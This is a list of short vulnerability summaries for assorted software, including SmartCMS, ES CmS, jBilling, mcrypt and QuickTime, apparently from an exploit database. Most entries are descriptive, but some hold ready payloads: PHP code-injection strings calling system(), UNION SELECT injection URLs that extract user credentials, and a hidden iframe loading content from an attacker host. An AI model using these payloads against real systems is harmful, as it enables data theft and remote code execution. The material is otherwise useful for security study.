A SQL injection vulnerability exists in SmartCMS, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be exploited to manipulate the database content, disclose sensitive information, or even execute arbitrary system commands.
An authenticated user could successfully bypass URL restrictions and access unauthorized sites by issuing a specially crafted request. To be completely stealth, just remove ?a? char and no log will be recorded. Limitations: It's only possible to issue GET requests and it will only work if the remote Webserver accepts malformed GET requests specifying a Content-Length, like Facebook, Hotmail, Etc. The attacker might use a WebProxy with this property, completely bypassing the filter.
Aviosoft Digital TV Player Professional 1.x is vulnerable to a buffer overflow vulnerability when a specially crafted .PLF file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .PLF file.
A buffer overflow vulnerability exists in BlazeVideo HDTV Player 6.6 Professional. The vulnerability is caused due to a boundary error when handling a specially crafted .PLF file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a malicious .PLF file. Successful exploitation may allow execution of arbitrary code.
This vulnerability allows an attacker to inject custom code into the server side scripting engine.It's possible to get a remote cmd by taking advantage of this vulnerability. Vulnerable function: /search/ () php code excution: http://localhost/path/search {Inject malicious code} () example of code you can inject: // ${@system(ls)} ${@print(hello)} $_GET['cmd'] //
This script exploit a stack based overflow in mcrypt <= 2.5.8. It bypasses NX and ASLR protections, but no SSP. This exploit crafts a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c.
ES CmS 0.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a crafted URL to the application. For example, http://localhost/page.php?id=[sqli] can be used to exploit this vulnerability. An attacker can also use the union select statement to retrieve data from the database. For example, http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod) and http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users can be used to retrieve data from the database.
jBilling does not properly check user input, thus allowing the <iframe> tag to be used in a malicious manner. For example, an individual with Add User rights could add multiple users and when those users log in, the following <iframe> tag would send them to a malicious website hosting malicious content: <iframe src=”http://attacker_host:4321/attack.html” height=”1” width=”1” style=”visibility: hidden;” /> The URLs that are affected are: http://[host]/jbilling/orderBuilder/edit?execution=e1s1&userId=[uid] Create a new order and in the notes section, input your malicious code. http://[host]/jbilling/customer/edit Add a new customer by going to the URL above and enter their details. In the description box, input your malicious code.
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
This exploit is a buffer overflow vulnerability in the LoadKeyByBlob function of the TCSD service. It sends a specially crafted packet to the TCSD service, which causes the service to crash due to an invalid type_offset value.
Services By CQR